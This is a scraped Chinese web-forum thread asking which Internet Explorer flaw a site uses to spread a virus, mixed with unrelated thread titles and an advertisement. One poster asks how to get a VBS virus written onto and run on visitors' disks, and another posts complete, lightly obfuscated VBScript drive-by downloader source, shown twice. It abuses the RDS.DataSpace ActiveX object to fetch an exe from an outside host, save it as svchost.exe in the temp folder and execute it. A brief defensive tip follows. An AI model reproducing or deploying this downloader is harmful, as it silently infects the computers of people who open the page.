请高手分析一下这个网站用了IE的什么漏洞传播病毒的? http://www.chmhome.com/technology/program-design/soft/20070707/81305.html打开这个网页,没什么问题。 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 参考:http://www.number87.com/computer/net/074136524005-k69q0301.htm 楼上的,谢谢你的回复,不过上面那个地方讲的太浅显了,我想编一个vbs脚本病毒很多人都会,最大的问题是当用户访问你的网站的时候,你怎么搞到权限把这个vbs写在用户的硬盘上,并且运行这个脚本。 FSO/ActiveX?用Firefox吧。 发一个我以前截获的一个病毒源代码:主要利用 adodb.stream、xmlhttp、fso等来下病毒并执行exe..<html><body><script type="text/jscript">function init () {document.write("<center><font color=red></font><center>");}window.onload = init;</script><script language="VBScript">on error resume nexttcsafe = "http://www.123.com/1.exe" //这个是病毒m1="object"m2="classid"m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"m4="Microsoft.XMLHTTP"m5="Shell.Application"m6="Scripting.FileSystemObject"sub tcsafe1exe(m5,X9)set Xe = Xc.createobject(m5,"")dd="open"Xe.ShellExecute X9,BBS,BBS,dd,0end subSet Xc = document.createElement(m1)Xc.setAttribute m2, m3Xi=m4Set Xd = Xc.CreateObject(Xi,"")a1="Ado"a2="db."a3="Str"a4="eam"a5=a1&a2&a3&a4Xg=a5set Xa = Xc.createobject(Xg,"")Xa.type = 1Xh="GET"Xd.Open Xh, tcsafe, FalseXd.SendX9="svchost.exe"set Xb = Xc.createobject(m6,"")set Xe = Xb.GetSpecialFolder(2)Xa.opendd="Xa.BuildPath(Xa,X8)"X8=ddd1="Xb.BuildPath(Xb,X7)"X7=d1d2="Xc.BuildPath(Xd,X6)"X6=d2d3="Xd.BuildPath(Xf,X5)"X5=d3d4="Xe.BuildPath(Xg,X4)"X4=d4d5="Xf.BuildPath(Xh,X4)"X3=d5d6="Xg.BuildPath(Xi,X3)"X2=d6d7="Xh.BuildPath(Xg,X1)"X1=d7d8="Xi.BuildPath(Xk,X0)"X0=d8X9= Xb.BuildPath(Xe,X9)Xa.write Xd.responseBodyXa.savetofile X9,2Xa.closecall tcsafe1exe(m5,X9)</script></body></html> 可以禁用fso组件等措施来防御 ls的ls...用的是这一个组件"BD96C556-65A3-11D0-983A-00C04FC29E36"很经典的一个利用... 请高手看下我的树形结构展开 倒计时程序中new Date()的参数如何实现从数据库中获取 JS美化select下拉菜单后,滚动条不见了 jquery 怎么捕捉div到浏览器边缘距离? 谁知道这个javascript如何解密?急!!!!!!!!!!!! 【寻书】100分求《动态HTML参考和开发应用大全》电子书,什么版本的都成 javascrip异步简单例子的疑问 在网页中如何用javascript控制IE的滚动条的滚动! 是不是 javascript 的漏洞?怎么解释呀? 提交后返回值是空,怎么才能得到我选择的值呢? 各位大大帮看下这段代码如何触发 如何判断鼠标已移出屏外?
最大的问题是当用户访问你的网站的时候,你怎么搞到权限把这个vbs写在用户的硬盘上,并且运行这个脚本。
用Firefox吧。
<body>
<script type="text/jscript">
function init () {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tcsafe = "http://www.123.com/1.exe" //这个是病毒
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripting.FileSystemObject"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
dd="Xa.BuildPath(Xa,X8)"
X8=dd
d1="Xb.BuildPath(Xb,X7)"
X7=d1
d2="Xc.BuildPath(Xd,X6)"
X6=d2
d3="Xd.BuildPath(Xf,X5)"
X5=d3
d4="Xe.BuildPath(Xg,X4)"
X4=d4
d5="Xf.BuildPath(Xh,X4)"
X3=d5
d6="Xg.BuildPath(Xi,X3)"
X2=d6
d7="Xh.BuildPath(Xg,X1)"
X1=d7
d8="Xi.BuildPath(Xk,X0)"
X0=d8
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
</body>
</html>
用的是这一个组件"BD96C556-65A3-11D0-983A-00C04FC29E36"
很经典的一个利用...